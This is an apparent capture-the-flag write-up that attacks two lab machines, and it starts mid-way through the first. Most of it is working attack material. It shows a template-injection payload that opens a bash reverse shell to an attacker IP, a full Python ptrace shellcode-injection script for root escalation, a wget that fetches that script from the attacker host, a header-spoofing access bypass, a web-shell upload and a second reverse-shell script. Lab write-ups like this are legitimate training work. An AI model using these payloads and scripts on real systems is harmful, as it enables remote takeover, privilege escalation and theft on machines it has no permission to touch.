47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# It has been reported that passwords should be enclosed with ticks/quotes
# It has been reported that passwords should be enclosed with ticks/quotes
#/etc/passwd###:
root:x:0:0:root:/root:/bin/bash
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
#/home/saket/.bashrc###:
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
username="admin"
password="Saket!#$%@!!"
#/home/saket/.profile###:

Try the recovered credentials at http://192.168.56.108:9999/

  • The username that works is saket (not the admin from .bashrc)
  • The password is Saket!#$%@!!


http://192.168.56.108:9999/?name={{1*1}},${1*1},<%1*1%>,[1*1]


The name parameter is rendered by a Tornado template ({% import os %} is Tornado syntax), so inject a reverse shell, sent URL-encoded:

{% import os%}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.56.102/7779 0>&1"')}}

%7B%25%20import%20os%20%25%7D%7B%7Bos.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.102%2F7779%200%3E%261%22%27)%7D%7D


Check for capability-based privilege escalation with /sbin/getcap -r / 2>/dev/null

saket@ubuntu:/$ /sbin/getcap -r / 2>/dev/null
/sbin/getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  • The capability on /usr/bin/python2.7 is the problem: cap_sys_ptrace lets it attach to processes of other users, including root
  • Use ps -aef | grep '/usr/sbin/apache2 -k start' to list the apache2 processes and pick the one running as root
saket@ubuntu:/$ ps -aef | grep '/usr/sbin/apache2 -k start' 
ps -aef | grep '/usr/sbin/apache2 -k start'
root 859 1 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 860 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 870 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 871 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 872 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 873 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 874 859 0 07:25 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1292 859 0 07:26 ? 00:00:00 /usr/sbin/apache2 -k start
saket 2182 2158 0 10:56 ? 00:00:00 grep --color=auto /usr/sbin/apache2 -k start

Exploit it with python2.7 inject.py 888, where 888 is the PID of the root-owned apache2 parent at the time (859 in the listing above):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

import ctypes
import sys
import struct

# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html

PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17

# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct

class user_regs_struct(ctypes.Structure):
_fields_ = [
("r15", ctypes.c_ulonglong),
("r14", ctypes.c_ulonglong),
("r13", ctypes.c_ulonglong),
("r12", ctypes.c_ulonglong),
("rbp", ctypes.c_ulonglong),
("rbx", ctypes.c_ulonglong),
("r11", ctypes.c_ulonglong),
("r10", ctypes.c_ulonglong),
("r9", ctypes.c_ulonglong),
("r8", ctypes.c_ulonglong),
("rax", ctypes.c_ulonglong),
("rcx", ctypes.c_ulonglong),
("rdx", ctypes.c_ulonglong),
("rsi", ctypes.c_ulonglong),
("rdi", ctypes.c_ulonglong),
("orig_rax", ctypes.c_ulonglong),
("rip", ctypes.c_ulonglong),
("cs", ctypes.c_ulonglong),
("eflags", ctypes.c_ulonglong),
("rsp", ctypes.c_ulonglong),
("ss", ctypes.c_ulonglong),
("fs_base", ctypes.c_ulonglong),
("gs_base", ctypes.c_ulonglong),
("ds", ctypes.c_ulonglong),
("es", ctypes.c_ulonglong),
("fs", ctypes.c_ulonglong),
("gs", ctypes.c_ulonglong),
]

libc = ctypes.CDLL("libc.so.6")

pid=int(sys.argv[1])

# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64

# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()

# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))

print("Instruction Pointer: " + hex(registers.rip))

print("Injecting Shellcode at: " + hex(registers.rip))

# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process, four bytes at a time.
for i in xrange(0,len(shellcode),4):

    # Convert the 4-byte chunk to little endian.
    shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
    shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
    shellcode_byte=int(shellcode_byte_little_endian,16)

    # Inject the chunk.
    libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)

print("Shellcode Injected!!")

# Modify the instruction pointer
registers.rip=registers.rip+2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))

print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

wget http://192.168.56.102:8082/inject.py

ps -aef | grep '/usr/sbin/apache2 -k start'

python2.7 inject.py 2237

ss -pantu | grep 5600

python2.7 -c 'import pty;pty.spawn("/bin/bash")'

Target machine: y0usef

https://www.cnblogs.com/shadow-/p/16909038.html

arp-scan -l -I eth0
nmap -A -T4 192.168.56.109
http://192.168.56.109/

We continue probing with whatweb to fingerprint the web application and see what is running.

whatweb http://192.168.56.109

┌──(root㉿kali)-[/home/kali/Desktop]
└─# whatweb http://192.168.56.109
http://192.168.56.109 [200 OK] Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.109], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]

dirsearch -u http://192.168.56.109

[08:49:16] Starting: 
[08:49:30] 301 - 324B - /adminstration -> http://192.168.56.109/adminstration/
[08:49:38] 200 - 791B - /index.php
[08:49:38] 200 - 791B - /index.php/login/
curl http://192.168.56.109/adminstration/ \
-H 'X-Forwarded-For: 127.0.0.1'
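
The /adminstration page lets the request through as soon as X-Forwarded-For claims 127.0.0.1, so the access control is keyed on a client-supplied header. As an added defender-side illustration (not code from the original post, and the target's real PHP check is not on the page), the observed behaviour is modelled in Python beside a hardened version that only honours X-Forwarded-For when the TCP peer is a proxy we operate; the proxy address 10.0.0.5 and the dict-style headers are assumptions.

```python
import ipaddress

# Assumption: the only reverse proxy that is allowed to append X-Forwarded-For.
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip_naive(peer_addr, headers):
    """Reproduces the observed weakness: the header is trusted from any peer,
    so a direct client chooses the address the access check will see."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return peer_addr


def client_ip_hardened(peer_addr, headers, trusted_proxies=TRUSTED_PROXIES):
    """Only honours X-Forwarded-For when the socket peer is a known proxy."""
    if peer_addr not in trusted_proxies:
        return peer_addr  # direct connection: the header is untrusted noise
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    # Walk right-to-left past the hops our own proxies appended; the first
    # address we did not add is the real client, whatever it prepended itself.
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            try:
                ipaddress.ip_address(hop)
            except ValueError:
                break  # malformed value: fall back to the socket address
            return hop
    return peer_addr


def admin_allowed(ip):
    """The rule the target appears to enforce: only loopback may reach the admin area."""
    return ipaddress.ip_address(ip).is_loopback
```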

Using mitmproxy

mitmproxy

:
set modify_headers '/~q/X-Forwarded-For/127.0.0.1'
ctrl + shift + d

In Firefox, set the proxy: manual proxy -> HTTP proxy 127.0.0.1, port 8080

Guessing passwords on the login page gives username=admin, password=admin.

Exploiting the file upload

webacoo -g -o a.php

mitmproxy on Kali failed to intercept the file upload, so Burp Suite (bp) on Win11 is used instead.

In Burp, add X-Forwarded-For: 127.0.0.1 to all requests.

files/1692252323a.php

Since we switched to Burp, a few extra complications have to be handled.

The idea is as follows: the Kali tool webacoo is proxied through proxychains to 192.168.56.1:8080 on the host machine, where Burp listens on that port and forwards the traffic; Burp rewrites the X-Forwarded-For header and then sends the traffic through the upstream proxy 127.0.0.1:7890 to my Clash (the upstream is optional); the traffic is destined for 192.168.56.109, so it ends up back at the target machine in VirtualBox, completing the operation.

cat /etc/proxychains4.conf > proxychains.conf
vim proxychains.conf  # change: socks4 127.0.0.1 9050 --> http 192.168.56.1 8080

proxychains -f proxychains.conf webacoo -t -u http://192.168.56.109/adminstration/upload/files/1692252323a.php

It was finally completed with Burp's help.

Next, use webacoo to get a reverse shell.

touch a.sh
echo '#! /bin/bash\nbash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > a.sh && chmod +x ./a.sh
./a.sh

python -c "import pty; pty.spawn('/bin/bash')"

Privilege escalation:

cat /etc/passwd

www-data@yousef-VirtualBox:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
yousef:x:1000:1000:yousef,,,:/home/yousef:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
guest-cpxNn2:x:116:125:Guest,,,:/tmp/guest-cpxNn2:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
  • User yousef is found
cd /home
ls
cat user.txt
echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d

ssh : 
user : yousef
pass : yousef123

ssh yousef@192.168.56.109

Second privilege escalation:

sudo -l

Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL

This account can run sudo -s directly to become root.

sudo -s

Root shell obtained, task complete!
